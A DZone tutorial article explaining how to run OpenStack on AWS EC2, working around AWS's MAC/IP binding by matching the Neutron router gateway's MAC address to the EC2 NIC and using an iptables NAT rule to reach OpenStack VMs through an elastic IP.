Make sure to save results!! df.to_csv(locs_df, "family_dollar_ID_locations.csv", sep = ",", index = False) We did it! There is a comma-separated list of all the Idaho Family Dollar stores. What a wild ride. A few words on Selenium and data scraping Selenium is a common utility for automatic interaction with a webpage. To explain why it's essential to use at times, let's go through an example using Walgreens' website. Inspect Element provides the code for what is displayed in a browser: While View Page Source provides the code for what requests will obtain: When these two don't agree, there are plugins modifying the source code—so, it should be accessed after the page has loaded in a browser. requests cannot do that, but Selenium can. Selenium requires a web driver to retrieve the content. It actually opens a web browser, and this page content is collected. Selenium is powerful—it can interact with loaded content in many ways (read the documentation). After getting data with Selenium, continue to use BeautifulSoup as before: url = "" driver = webdriver.Firefox(executable_path = 'mypath/geckodriver.exe') driver.get(url) soup_ID = BeautifulSoup(driver.page_source, 'html.parser') store_link_soup = soup_ID.find_all(class_ = 'col-xl-4 col-lg-4 col-md-4') I didn't need Selenium in the case of Family Dollar, but I do keep it on hand for those times when rendered content differs from source code. Wrapping up In conclusion, when using web scraping to accomplish a meaningful task: - Be patient - Consult the manuals (these are very helpful) If you are curious about the answer: There are many many Family Dollar stores in America. The complete source code is: import requests from bs4 import BeautifulSoup import json from pandas import DataFrame as df page = requests.get("") soup = BeautifulSoup(page.text, 'html.parser') # find all state links state_list = soup.find_all(class_ = 'itemlist') state_links = [] for i in state_list: cont = i.contents[0] attr = cont.attrs hrefs = attr['href'] state_links.append(hrefs) # find all city links city_links = [] for link in state_links: page = requests.get(link) soup = BeautifulSoup(page.text, 'html.parser') familydollar_list = soup.find_all(class_ = 'itemlist') for store in familydollar_list: cont = store.contents[0] attr = cont.attrs city_hrefs = attr['href'] city_links.append(city_hrefs) # to get individual store links store_links = [] for link in city_links: locpage = requests.get(link) locsoup = BeautifulSoup(locpage.text, 'html.parser') locinfo = locsoup.find_all(type="application/ld+json") for i in locinfo: loccont = i.contents[0] locjson = json.loads(loccont) try: store_url = locjson['url'] store_links.append(store_url) except: pass # get address and geolocation information stores = [] for store in store_links: storepage = requests.get(store) storesoup = BeautifulSoup(storepage.text, 'html.parser') storeinfo = storesoup.find_all(type="application/ld+json") for i in storeinfo: storecont = i.contents[0] storejson = json.loads(storecont) try: store_addr = storejson['address'] store_addr.update(storejson['geo']) stores.append(store_addr) except: pass # final data parsing stores_df = df.from_records(stores) stores_df.drop(['@type', 'addressCountry'], axis = 1, inplace = True) stores_df['Store'] = "Family Dollar" df.to_csv(stores_df, "family_dollar_locations.csv", sep = ",", index = False) -- Author's note: This article is an adaptation of a talk I gave at PyCascades in Portland, Oregon on February 9, 2020. 3 Comments wonderfull article, thanks When I scrap a json for another site I get ‘b’ and random characters. Any idea why? This is a great guide, thank you! I appreciate that you also thought to mention the ethical considerations--it probably wouldn't have occurred to me to consider that otherwise.
https://opensource.com/article/20/5/web-scraping-python
CC-MAIN-2020-34
refinedweb
2,983
57.27
Country Search > Bangladesh > import item: 84 Product(s) found from 38 Suppliers Sort by: View: List View Gallery View Order Quantity Hot import item Directory: Recommended import item Haven't found the right supplier yet ? AliSourcePro Tell us what you buy, Alibaba's Industry Sourcing Specialists will help you match the right suppliers. Post Buying Request Now >> Want product and industry knowledge for "import ite..." ? Trade Alert Trade Alerts are FREE updates on topics such as trending hot products, buying requests and supplier information - sent directly to your email inbox! Do you want to show import item or other products of your own company? Display your Products FREE now! Category - 100% Cotton Fabric (25) - T-Shirts (21) - Women's Panties (1) - Men's T-Shirts (12) - Ladies' Blouses & Tops (9) - Pants & Trousers (3) - View more - Other Electronic Components (1) Other Category Material - 100% Cotton (35) - Other (15) Product Type - Shirts (1) - Panties (1) - T-Shirts (21) - Blouses & Tops (9) Welcome to Alibaba.com Over 2 million supplier storefronts Safe and simple trade solutions Easily access verified suppliers User Guide Not sure how to use Alibaba.com? Want to source safely and easily?
http://www.alibaba.com/countrysearch/BD/import-item.html
CC-MAIN-2013-48
refinedweb
192
50.97
After a long vacation with my children, I’ve been meditating on the virtues of silence. Python is a glorious toybox bursting with fun gadgets to delight TA’s near and far. You can easily use it to stuff anything from database access to a serial port controller into your copy of Maya, which is a always fun (and occasionally useful). However the plethora of Python libraries out there does bring with it a minor annoyance - if you grab something cool off the cheeseshop you don’t know exactly how the author wants to communicate with users. All too often you incorporate something useful into your Maya and suddenly your users have endless reams of debug printouts in their script listener — info that might make sense to a coder or a sysadmin but which is just noise (or worse, slightly scary) for your artists. If you’re suffering from overly verbose external modules, you can get a little peace and quiet with this little snippet. The Silencer class is just a simple context manager that hijacks sys.stdout and sys.stderr into a pair of StringIO’s that will just silently swallow any printouts that would otherwise go to the listener. import sys from StringIO import StringIO class SilencedError ( Exception ): pass class Silencer( object ): ''' suppress stdout and stderr stdout and stderr are redirected into StringIOs. At exit their contents are dumped into the string fields 'out' and 'error' Typically use this via the with statement: For example:: with Silencer() as fred: print stuff result = fred.out note that if you use a silencer to close down output from the logging module, you should call logging.shutdown() in the silencer with block ''' def __init__( self, enabled=True ): self.oldstdout = sys.stdout self.oldstderr = sys.stderr self._outhandle = None self._errhandle = None self.out = "" self.err = "" self.enabled = enabled def __enter__ ( self ): if self.enabled: self.oldstdout = sys.stdout self.oldstderr = sys.stderr sys.stdout = self._outhandle = StringIO() sys.stderr = self._errhandle = StringIO() self._was_entered = True return self else: self._was_entered = False def _restore( self ): if self._was_entered: self.out = self._outhandle.getvalue() self.err = self._errhandle.getvalue() sys.stdout = self.oldstdout sys.stderr = self.oldstderr self._outhandle.close() self._errhandle.close() self._outhandle = self._errhandle = None def __exit__( self, type, value, tb ): se = None try: if type: se = SilencedError( type, value, tb ) except: pass finally: self._restore() if se: raise se If you actually need to look at the spew you can just look at the contents of the out and error fields of the Silencer. More commonly though you’ll just want to wrap a particularly verbose bit of code in a with… as block to shut it up. You’ll also get the standard context manager behavior: an automatic restore in the event of an exception, etc.
https://theodox.github.io/2014/sounds_of_silence
CC-MAIN-2017-26
refinedweb
468
53.81
This article comes from: PerfMa technology community summary JDK8 upgrade, most of the problems may be encountered in the compile time, but sometimes it is more painful, there is no problem in the compile time, but there is a problem in the run time, such as today's topic, so when you upgrade, you still need to test more and then go online, of course, JDK8 brings us a lot of dividends, and it is worth taking a little time to upgrade. Problem description It's still the old rule. First, go to demo to let you know what we are going to say intuitively. public class Test { static <T extends Number> T getObject() { return (T)Long.valueOf(1L); } public static void main(String... args) throws Exception { StringBuilder sb = new StringBuilder(); sb.append(getObject()); } } demo is very simple. There is a generic function getObject whose return type is Number subclass. Then we pass the function return value to the polymorphic method append of StringBuilder. We know that there are many append methods and many parameter types, but there is no append method whose parameter is Number. If there is one, you should guess that this method will be preferred Now, since there is no one, which one will we choose? We use JDK6 (similar to JDK7) and jdk8 to compile the above classes respectively, and then use javap to see the output results (only see the main method): Bytecode compiled by jdk6: public static void main(java.lang.String...) throws java.lang.Exception;: invokevirtual #6 // Method java/lang/StringBuilder.append:(Ljava/lang/Object;)Ljava/lang/StringBuilder; 15: pop 16: return LineNumberTable: line 8: 0 line 9: 8 line 10: 16 Exceptions: throws java.lang.Exception jdk8 Compiled bytecode: public static void main(java.lang.String...) throws java.lang.Exception; descriptor: ([Ljava/lang/String;)V: checkcast #6 // class java/lang/CharSequence 15: invokevirtual #7 // Method java/lang/StringBuilder.append:(Ljava/lang/CharSequence;)Ljava/lang/StringBuilder; 18: pop 19: return LineNumberTable: line 8: 0 line 9: 8 line 10: 19 Exceptions: throws java.lang.Exception Compared with the difference above, we can see that bci has changed since 12. The following line is added in jdk8 to indicate that a type check should be performed on the data at the top of the stack to see if it is CharSequence type: 12: checkcast #6 // class java/lang/CharSequence In addition, the append method of StringBuilder called is also different. In jdk7, the append method of Object type is called, while in jdk8, the append method of CharSequence type is called. The main thing is to run the above code under jdk6 and jdk8. It runs normally under jdk6, but directly throws an exception under jdk8: Exception in thread "main" java.lang.ClassCastException: java.lang.Long cannot be cast to java.lang.CharSequence at Test.main(Test.java:9) At this point, the whole problem should be described clearly. problem analysis First of all, let's talk about how to implement this function in the java compiler. Others are very clear. The focus is on how to determine which method to use in append as follows: sb.append(getObject()); We know that getObject() returns a generic Object, which is a subclass of Number. Therefore, we will first traverse all visible methods of StringBuilder, including those inherited from the parent class, to find out whether there is a method called append, and the parameter type is Number. If there is one, use this method directly. If not, we have to think The key to finding the most suitable method is how to define it. For example, we see that there is an append method whose parameter is of Object type and Number is a subclass of Object, so we can choose this method. If there is another append method whose parameter is of Serializable type (of course, there is no such parameter method), numbe R implements this interface, so we can choose this method. Is it more suitable for the Object parameter or the Serializable parameter? What's more, we know that StringBuilder has a method, whose parameter is CharSequence, and the parameter we pass in is actually a subclass of Number, and we also implement the interface of CharSequence. So what are we going to do Do you want to choose it? We need to think about all these problems, and each has its own reasons. It seems reasonable to say so. Type derivation of generics in JDK6 The Java C code of jdk6 is analyzed here, but the logic for this problem in jdk7 is almost the same. So take this as an example. The generic type derivation in jdk6 is actually relatively simple. From the above output, we can also guess that it is the append method with the parameter of Object type, which is the most appropriate: private Symbol findMethod(Env<AttrContext> env, Type site, Name name, List<Type> argtypes, List<Type> typeargtypes, Type intype, boolean abstractok, Symbol bestSoFar, boolean allowBoxing, boolean useVarargs, boolean operator) { for (Type ct = intype; ct.tag == CLASS; ct = types.supertype(ct)) { ClassSymbol c = (ClassSymbol)ct.tsym; if ((c.flags() & (ABSTRACT | INTERFACE | ENUM)) == 0) abstractok = false; for (Scope.Entry e = c.members().lookup(name); e.scope != null; e = e.next()) { //- System.out.println(" e " + e.sym); if (e.sym.kind == MTH && (e.sym.flags_field & SYNTHETIC) == 0) { bestSoFar = selectBest(env, site, argtypes, typeargtypes, e.sym, bestSoFar, allowBoxing, useVarargs, operator); } } //- System.out.println(" - " + bestSoFar); if (abstractok) { Symbol concrete = methodNotFound; if ((bestSoFar.flags() & ABSTRACT) == 0) concrete = bestSoFar; for (List<Type> l = types.interfaces(c.type); l.nonEmpty(); l = l.tail) { bestSoFar = findMethod(env, site, name, argtypes, typeargtypes, l.head, abstractok, bestSoFar, allowBoxing, useVarargs, operator); } if (concrete != bestSoFar && concrete.kind < ERR && bestSoFar.kind < ERR && types.isSubSignature(concrete.type, bestSoFar.type)) bestSoFar = concrete; } } return bestSoFar; } The above logic is probably to traverse the current class (such as StringBuilder in this example) and its parent class, and then find the most appropriate method to return from their methods, focusing on the method of selectBest: Symbol selectBest(Env<AttrContext> env, Type site, List<Type> argtypes, List<Type> typeargtypes, Symbol sym, Symbol bestSoFar, boolean allowBoxing, boolean useVarargs, boolean operator) { if (sym.kind == ERR) return bestSoFar; if (!sym.isInheritedIn(site.tsym, types)) return bestSoFar; assert sym.kind < AMBIGUOUS; try { if (rawInstantiate(env, site, sym, argtypes, typeargtypes, allowBoxing, useVarargs, Warner.noWarnings) == null) { // inapplicable switch (bestSoFar.kind) { case ABSENT_MTH: return wrongMethod.setWrongSym(sym); case WRONG_MTH: return wrongMethods; default: return bestSoFar; } } } catch (Infer.NoInstanceException ex) { switch (bestSoFar.kind) { case ABSENT_MTH: return wrongMethod.setWrongSym(sym, ex.getDiagnostic()); case WRONG_MTH: return wrongMethods; default: return bestSoFar; } } if (!isAccessible(env, site, sym)) { return (bestSoFar.kind == ABSENT_MTH) ? new AccessError(env, site, sym) : bestSoFar; } return (bestSoFar.kind > AMBIGUOUS) ? sym : mostSpecific(sym, bestSoFar, env, site, allowBoxing && operator, useVarargs); } The main logic of this method lies in the rawinstance method (the specific code will not be pasted, and I will look at the code with interest. I will paste the most critical call method, argumentsAcceptable, which is mainly used for parameter matching). If the current method is also suitable, then make a comparison with the best method selected before to see who is most suitable. This selection process is in the last mo In the stspecific method, it's actually similar to bubble sorting, but it's just to find the closest type (layer by layer searching for the method corresponding to the parent class, which is similar to the minimum common multiple). boolean argumentsAcceptable(List<Type> argtypes, List<Type> formals, boolean allowBoxing, boolean useVarargs, Warner warn) { Type varargsFormal = useVarargs ? formals.last() : null; while (argtypes.nonEmpty() && formals.head != varargsFormal) { boolean works = allowBoxing ? types.isConvertible(argtypes.head, formals.head, warn) : types.isSubtypeUnchecked(argtypes.head, formals.head, warn); if (!works) return false; argtypes = argtypes.tail; formals = formals.tail; } if (formals.head != varargsFormal) return false; // not enough args if (!useVarargs) return argtypes.isEmpty(); Type elt = types.elemtype(varargsFormal); while (argtypes.nonEmpty()) { if (!types.isConvertible(argtypes.head, elt, warn)) return false; argtypes = argtypes.tail; } return true; } For specific examples, it is actually to see which method's parameter in StringBuilder is the parent class of Number. If it is not, it means it is not found. If all the parameters meet the expectations, it means it is found, and then it returns. So the logic in jdk6 is relatively simple. Type derivation of generics in JDK8 The derivation in jdk8 is relatively complex, but most of the logic is similar to the above, but the argumentsacceptable changes a lot, adding some data structures, making the rules more complex, and considering more scenarios. Because the code nesting level is very deep, I will not paste the specific code, and I will follow the next code if I am interested (the specific changes can be From AbstractMethodCheck.argumentsAcceptable This method starts). For this demo, if the Object returned by getObject implements both CharSequence and Number subclass, it thinks that in this case, the append method with parameter of CharSequence type is more suitable than the method with parameter of Object type. It seems to be more strict, and its scope of application is narrowed, not to match the large and standard interface method. Therefore, it There is an extra layer of checkcast, but I think it's a little too radical. Let's study together: JVM parameters of PerfMa KO series [Memory chapter] Troubleshooting and analysis of a large number of zombie processes in Docker container
https://programmer.ink/think/changes-of-jdk8-in-generic-type-derivation.html
CC-MAIN-2021-39
refinedweb
1,564
57.37
Hi!> > "..metas" will collide less often. Apparently Meta is a finnish name or > something, so Linus does not like it. The exact string is really not > very important to me. I agree that "..." is elegant.Well, "..." is mostly used by script kiddies -- they usually havetheir rootkit collection there :-).It would be nice to decide on one escape into "meta" namespace,uservfs and similar projects probably should be converted to use sameescape.[Uservfs currently uses things like cat /tmp/foo.tgz#utar/bar.gz#ugz... essentially using # as another separator. It should probably beconverted to use same meta escape]. Pavel-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
http://lkml.org/lkml/2004/9/7/291
CC-MAIN-2015-06
refinedweb
127
61.02
Whenever I'm developing an application, I always find it easier to use a control or library that someone else has already written rather than to try to do it myself. That's why I, and no doubt many of you, come to the Code Project - because it's a fantastic resource for ready made components. However, when you get here, you have to trawl through to find what your looking for, download the source and the demo project, build them to make sure they work, then copy them somewhere useful, then add them to your project and then you can start to use it. This is where Code Store comes in. Code Store is an add-in providing you with instant integrated access to an online repository of .NET components. All of the components are already built and ready to use; all Code Store does is download the ones you ask for and then automatically adds them to the toolbox ready for you to use in your project. Having rethought my earlier statement (below) and my current circumstances, I have decided that I do not have the financial resources to be able to support such a venture. I am therefore offering CodeStore to CodeProject as a free and exclusive service to all CodeProject members. I am currently waiting to hear from Chris Maunder, which has caused delays to the development. Development has now restarted as I am keen to be able to provide something to the #Develop team as soon as possible. The web site design has been revamped, courtesy of Movable Type (back-end) and Paul Watson (new layout). The RSS feed has changed to this. I am currently considering the possibility of leaving my job and concentrating on the development of Code Store. I believe that it has real potential, especially once we have reached the stage where UI and non-UI components are supported as well as ASP.NET Web Controls. In order to make this happen, I would need to make some kind of charge. I don't think selling the software itself is the way to go, I think that having a subscription based service that allows users to download components is a better approach. I am currently thinking of somewhere in the region of £10 per year as the subscription fee at the entry level to allow access to free components (like those available here at the Code Project). Later, higher level subscriptions could be introduced that provide access to professional components like those produced by Dundas. In order to protect Code Store, updates to the source code will no longer be made available for download. The source for version 2.0 is (and will remain) available for download. Updates and new releases to the software will continue to be made available here. To get started, just download one of the setup projects (see links at the top of the article), and install Code Store. Once installed, go to the Tools menu and choose "Code Store". This will download an XML file that lists the available components, which is then parsed to display a list to you. Select the components you want and click on download. After each component has completed, it is added to a tab called "Code Store" in the toolbox. As with most of my work of this sort of scale, I started off with some design. I always start off with a Use Case diagram as I find it a good, clear way of representing the requirements from a user's point of view and I can always keep referring back to it to check I'm still going the right way. Figure 1 - Use Case Diagram Showing Add-in Use Having developed Code Store to its initial release and on to version 1.2 in order to meet the competition deadline, it was then time to learn from what I had done and designed, then re-write it all. This gave rise to version 2.0, which is separated into three areas: interaction with Visual Studio, file downloads and the user interface. This structure is illustrated in the following package diagram: Figure 2 - Package Diagram Showing Overall Structure The following set of diagrams present each of the packages in the add-in: Figure 3 - Class Diagram for the Salamander.Addins.CodeStore Namespace Figure 4 - Class Diagram for the Salamander.Addins.CodeStore.Engine Namespace Figure 5 - Class Diagram for the Salamander.Addins.CodeStore.UserInterface Namespace The add-in contains a single command that when executed first downloads the component list XML file from the server. This XML file is parsed and then the details are added to a ListView control and displayed to the user with checkboxes. The user ticks the checkbox for each component they want to download and then, in turn, each component is downloaded. The progress event is used to display current download progress. ListView The download complete event is then used to add the control to the CodeStore tab on the toolbox (see Points of Interest below). There are essentially two parts to the add-in: the first is the interaction with Visual Studio and the second performs the file downloads. The add-in is setup and configured during the OnConnection event. The command is only added to the menu during UI setup (connectMode == Extensibility.ext_ConnectMode.ext_cm_UISetup), which occurs the first time the add-in is loaded after installation to enable users to customize their user interface without having it reset each time the add-in loads. This UI setup phase is determined for each add-in based on a value for each add-in in the HKCU\Software\Microsoft\VisualStudio\7.1\PreloadAddinState\ key. If the value (e.g. Salamander.Addins.CodeStore.Connect) is '1', then the user interface has yet to be initialized, if it is '0', then user interface initialization has already occurred. OnConnection connectMode == Extensibility.ext_ConnectMode.ext_cm_UISetup HKCU\Software\Microsoft\VisualStudio\7.1\PreloadAddinState\ Salamander.Addins.CodeStore.Connect 1 0 Having added the command to the Tools menu, the add-in then looks to see if the Code Store tab already exists in the toolbox; if it doesn't, then one is created. All user interface components downloaded by Code Store are added to the Code Store tab on the toolbox. This occurs even if no solution is loaded. ToolBoxTab toolBoxTab = null; try { Window win = applicationObject.Windows.Item(EnvDTE.Constants.vsWindowKindToolbox); ToolBox toolBox = (ToolBox)win.Object; ToolBoxTabs toolBoxTabs = toolBox.ToolBoxTabs; // Look to see if it's already been added. for (int i = 1; i < toolBoxTabs.Count; i++) { if ("Code Store" == toolBoxTabs.Item(i).Name) { toolBoxTab = toolBoxTabs.Item(i); break; } } if (null == toolBoxTab) { toolBoxTab = toolBoxTabs.Add("Code Store"); } The remaining interaction with Visual Studio comes once a component has been downloaded. Once the file has been downloaded, that component is added to the CodeStore tab on the toolbox. This is done as follows: this.toolBoxTab.ToolBoxItems.Add(comp.Name, strPath, EnvDTE.vsToolBoxItemFormat.vsToolBoxItemFormatDotNETComponent); comp.Name Name strPath FileName For a non-user interface component (supported since version 2.1), an assembly reference is added to the first project in the solution, if one is currently loaded. The process involved in downloading the files is very simple, performing each download, one after the other in a separate thread to keep the user interface responsive. The download classes were originally Ray Hayes' WebDownload class. Though these have been re-written from scratch, they are still fairly similar. Ray's article describes the download process and so I have not reproduced it here. The class diagram for the Salamander.Net namespace containing the WebDownload class is as follows: Salamander.Net WebDownload Figure 6 - Class Diagram for the Salamander.Net Namespace A very simple XML file is used to transfer the component information. It is simply stored on the CodeStore web server and downloaded by the add-in each time the components list is displayed. My original hope was that MySQL (the current database of components) would be able to export the table contents in well-formed XML. Unfortunately, it incorrectly closes each tag (it does not include the '/') and there is no container for each row, so some manual editing is required first. My hope is that in time the back-end could be ported over as some kind of web service running off SQL Server, so hopefully those XML export issues will go away. The file itself simply contains a "codestore" element, which then contains a "component" element for each of the components. The Component element consists of the following items: codestore component Component ID Version Description Author DateSubmitted MoreInfo A sample of the XML file is as follows: <?xml version="1.0"?> <codestore> <component> <ID>1</ID> <Name>Browse For Folder</Name> <FileName>Salamander.Windows.Forms.BrowseForFolder.dll</FileName> <Version>1.0.1221.24682</Version> <Description>Managed wrapper around the BrowseForFolder function.</Description> <Author>Derek Lakin</Author> <DateSubmitted>2003-06-24 10:28:50</DateSubmitted> <MoreInfo>NULL</MoreInfo> </component> <component> <ID>2</ID> <Name>Collapsible Panel Bar</Name> <FileName>CollapsiblePanelBar.dll</FileName> <Version>1.4.1059.25679</Version> <Description>Panel and panel bar class that imitate Windows XP collapsible panels.</Description> <Author>Derek Lakin</Author> <DateSubmitted>2003-06-24 10:28:50</DateSubmitted> <MoreInfo> products/collapsiblepanelbar.htm</MoreInfo> </component> </codestore> Since version 1.2, proxy server support has been added (due to the help and support of Alex Kucherenko). Since version 2.0, the proxy server settings have been editable from the 'Options' section. The proxy settings are applied in the ApplySettings method in the Engine class: ApplySettings Engine /// <SUMMARY> /// Apply the current add-in options. /// </SUMMARY> internal void ApplyOptions() { WebProxy proxy = GlobalProxySelection.GetEmptyWebProxy() as WebProxy; try { proxy = WebProxy.GetDefaultProxy(); } // only IE 5.5 and higher catch (System.Exception exc) { System.Diagnostics.Trace.WriteLine(exc.Message, "Engine.ApplyOptions"); } try { if (true == this.options.UseProxy) { proxy = new WebProxy(this.options.ProxyAddress + ":" + this.options.ProxyPort, this.options.BypassProxyOnLocal); if (true == this.options.ProxyAuthorisation) { if (this.options.ProxyUser != null && this.options.ProxyUser.Length > 0) proxy.Credentials = new NetworkCredential( this.options.ProxyUser, this.options.ProxyPassword); } else { proxy.Credentials = System.Net.CredentialCache.DefaultCredentials; } } } finally { this.webProxy = proxy; } this.formCodeStore.userControlOptions.ApplyOptions(ref this.options); } In addition to the add-in itself, there is a web site () that also allows you to browse the available components and allows component developers to add information about their components into the database. For several reasons, there is no live component upload feature. The major reason is time and my inability to get it to work :/. But another reason is security. I want to be able to check components before they are made available, to stop malicious code getting into other people's systems. The web site hosts a MySQL database, which is used to display the component list on the site and also to generate the XML file that is downloaded by the add-in. But, mainly the purpose of the site is to host the actual components themselves. Version 1.2 is available for .NET 1.1 and 1.0, but the new version 2.0 (and later) is currently only available for .NET 1.1. If anyone can provide some useful insight into converting from VS.NET 7.1 to 7.0, especially with regard to Deployment Projects and resx files, I would like to hear from you. Currently, only independent UI and non-UI components are supported, i.e. components that are not dependent on additional libraries (other than the standard .NET Framework libraries). In time, support for compressed archives and dependent files as well as support for ASP.NET Web Controls will be added. Other forthcoming features are detailed in the "Future Features" section below. There are two bugs that I am aware of that relate specifically to this add-in and they are both to do with adding things to the toolbox. The first requires the Property Window to be opened before you can successfully add a control to the toolbox and the second requires the tab to have focus. Despite numerous rumors and attempts in different threads in different newsgroups, the most reliable solution to these bugs is as follows. Firstly, you need to call: applicationObject.ExecuteCommand("View.PropertiesWindow"); Then, before you call ToolBoxItems.Add(), you need to call: ToolBoxItems.Add() myTab.Activate(); This add-in has the potential to be enormously useful and to save time for developers like you and me. However, it is nothing if there are only a few components to download. So, if you are a .NET developer and you have a UI control, a library of them or some other code library, then go here and register the details, then send me the release build DLL to codestore@salamandersoftware.biz. If anyone feels that they have something they could add to the Code Store development or can provide the implementation for any of the "future features" below, then you can register and join in at the GotDotNet Code Store Workspace. Many thanks to Paul Watson and Alex Kucherenko for their testing effort prior to release as well as Matt Dixon and Marc Merritt for their assistance with the post-release bugs in version 2.0. Thanks also to Furty for his Collapsible Splitter control. Many thanks to all those authors who have contributed their work to the initial repository of components. The current development plan is detailed below. The timescales are estimates and could easily slide if Real Life™ gets in the way. The plan includes features that have definitely made the cut; additional features may also be added, especially if enough people ask for it. Initial release of basic functionality. Proxy server support plus minor bug fixes. Rework internal architecture to separate functionality. New user interface - edit options without editing registry. completed early: 22/07/2003 Add automatic update notification (pull not push) - based on update interval in options. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Derek Lakin --------------------------- Code Store --------------------------- An error occurred during Code Store startup. Please contact derek.lakin@salamandersoftware.biz with the following information: System.ArgumentException: The parameter is incorrect. at EnvDTE.Commands.Item(Object index, Int32 ID) at Salamander.Addins.CodeStore.Connect.OnConnection(Object application, ext_ConnectMode connectMode, Object addInInst, Array& custom) --------------------------- OK --------------------------- General News Suggestion Question Bug Answer Joke Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/4400/Code-Store-A-VS-NET-Add-in
CC-MAIN-2015-14
refinedweb
2,408
57.06
Functional programming means handling a large chunk of code by defining your own functions. It means comparing a problem to a set of functions. In this article, I’ll walk you through what functional programming in Python is. What is Functional Programming? Functional programming means producing outputs by taking only inputs and not affecting any internal state that may affect the output of a particular input. Also, Read – Python Projects with Source Code: Solved and Explained. It is a method of managing your large code in small tasks that can be used from multiple places within an application. For example, if something you want to implement in your app requires a dozen lines of code, you don’t want to repeat the same code every time you need to. Also, whenever you want to change anything or want to fix a mistake in some code, you don’t have to do it every place you wrote the code. If this code is inside a function, you can only change or correct it on location. Functional Programming in Python Here are the 4 techniques we use for functional programming in Python: - Lambda Function - Map Function - Reduce Function - Filter Function Now let’s go through all these techniques one by one. Lambda Function: An anonymous function is defined using lambda. Lambda settings are set to the left of the colon. The body of the function is defined to the right of the colon. Let’s see how to use the lambda function in Python: s=lambda x:x*x s(2) 4 Map Function: The Map function takes a function as a collection of items, then creates a new empty collection and runs on the function on each item present in the original collection and inserts each returned value into the new collection and returns the new collection as an output. Let’s see how to use the map function in Python: def addition(n): return n + n numbers = (1, 2, 3, 4) result = map(addition, numbers) print(list(result)) [2, 4, 6, 8] Reduce Function: Just like the map function, the reduce function also takes a function as a collection of items and then returns the value created by combining the items. Let’s see how to use the reduce function in Python: import functools def mult(x,y): print("x=",x," y=",y) return x*y fact=functools.reduce(mult, range(1, 10)) print(fact) x= 1 y= 2 x= 2 y= 3 x= 6 y= 4 x= 24 y= 5 x= 120 y= 6 x= 720 y= 7 x= 5040 y= 8 x= 40320 y= 9 362880 Filter Function: Just like the map and reduce functions, the filter function also takes a function as a collection of elements and then returns the collection of each element where the function returned True. Let’s see how to use the filter function in Python: seq = [0, 1, 2, 3, 5, 8, 13] result = filter(lambda x: x % 2 != 0, seq) print(list(result)) [1, 3, 5, 13] Summary So we use lambda, map, reduce, and filter functions in Python for functional programming. You should try to use these functions in between your projects to master them properly. You can get the complete code use in this article from below. I hope you liked this article on what is functional programming in Python. Feel free to ask your valuable questions in the comments section below.
https://thecleverprogrammer.com/2021/01/31/functional-programming-in-python/
CC-MAIN-2021-43
refinedweb
573
65.46
Deploying OpenStack on AWS Deploying OpenStack on AWS It might sound like Cloudception, but you can deploy OpenStack over AWS, assuming you handle the various networking problems that will pop up. Join the DZone community and get the full member experience.Join For Free Discover a centralized approach to monitor your virtual infrastructure, on-premise IT environment, and cloud infrastructure – all on a single platform. A Cloud a virtual machine. However, unlike a usual nested hypervisor setup, Installing OpenStack on AWS EC2 instances has a few restrictions on the networking part for the OpenStack setup to work properly. This blog outlines the limitations and their solutions to run OpenStack on top of an AWS EC2 VM. Limitations The AWS environment will allow packets to flow in their network only when the MAC address is known/registered in the AWS network environment. Also, the MAC address and the IP address are tightly mapped, so the AWS environment will not allow packet flow if the MAC address registered for the given IP address is different. You may wonder whether the above restrictions will impact the OpenStack setup on AWS EC2. Yes! Yes, it will! While configuring the Neutron networking, we would be creating a virtual bridge (say, br-ex ) for the provider network where all the VM's traffic will reach the Internet via the external bridge, followed by the actual physical NIC (say, eth1). In that case, we usually configure the external interface (NIC) with a special type of configuration, as follows. Ref: Due to this special type interface configuration, the restriction in AWS will hit OpenStack's networking. In a mainstream OpenStack setup, the above-mentioned provider interface would be configured with a special NIC configuration that would have no IP for that interface and would allow all packets via that specially configured NIC. Moreover, the VM packets reaching Internet via this specially configured NIC would “ip netns show” followed by the “ip netns exec qr-: Register the router’s MAC address and its IP address with AWS environment. However, this is not feasible. AWS currently does not have the features available to register any random MAC address and IP address inside the VPC. Moreover, allowing this type of functionality would be a severe security threat to the environment., neutron router-gateway-set router provider --fixed-ip ip_address=<Registered_IP_address*> IP Address and MAC Address Mismatch After configuring router gateway with the AWS-registered IP address, each packet from the router’s gateway will have the AWS-registered IP address as the source IP address — but with the IP address, we need to change the MAC address of router’s interface. The below-mentioned steps will do that magic. Install macchanger. Note down the actual/original MAC address of the provider NIC (eth1). Change the MAC address of the provider NIC (eth1). Change the MAC address of the router’s gateway interface to the original MAC address of eth1. Now, try to ping 8.8.8.8 from the router namespace. If you get a successful ping response, then we are done with Cloud on Cloud setup. Key Points to Remember Change the MAC address: In my case, I had worked in the MAC address of the NIC. Floating IP disabled: Associating a floating IP to any OpenStack VM will send the packet via the router’s gateway with the source IP address as a floating IP address. This will make the packets to hit the AWS switch with non-registered IP and MAC addresses, which results in dropping the packets. So, we could not use the floating IP functionality in this setup. However, still, we could access the VM publicly using the below mentioned NAT process. NAT to access OpenStack VM: Like I mentioned above, we could access the OpenStack VM publicly using the registered IP address that we have assigned for our router’s gateway. Use the following NAT command to access the OpenStack VM using the AWS EC2 instance’s elastic IP: $ ip netns exec qrouter-f85bxxxx-61b2-xxxx-xxxx-xxxxba0xxxx iptables -t nat -A PREROUTING -p tcp -d 172.16.20.101 --dport 522 -j DNAT --to-destination 192.168.20.5:22 Note: In the above command, I had a NAT for forwarding all packets for 172.16.20.101 with port 522. Using the above NAT command, all the packets reaching 172.16.20.101 with port number 522 will be forwarded to 192.168.20.5:22. Here, 172.16.20.101 is the registered IP address of the AWS EC2 instance, which was assigned for the router’s gateway, and 192.168.20.5 is the local IP of the OpenStack VM. Notably, 172.16.20.101 already has a NAT with the AWS Elastic IP, which means all the traffic that comes to the elastic IP (public IP) will be forwarded to this VPC local IP (172.16.20.101). In short: [Elastic IP]:522 > 172.16.20.101:522 > 192.168.20.5:22. This means you could SSH the OpenStack VM globally by using the elastic IP address and the respective port number. Elastic IP address: For this type of customized OpenStack installation, we required at least two NICs for the AWS EC2 instance. You need one for accessing the VM terminal for the installation and for accessing the dashboard. In short, it acts as a management network/VM tunnel network/API network. The second one is for an external network with a unique type of interface configuration and mapped with the provider network bridge, say br-ex with eth1. AWS will not allow any packets to travel out of the VPC unless the elastic IP is attached with that IP address. To overcome this problem, we must attach the elastic IP for this NIC. The packets of OpenStack’s 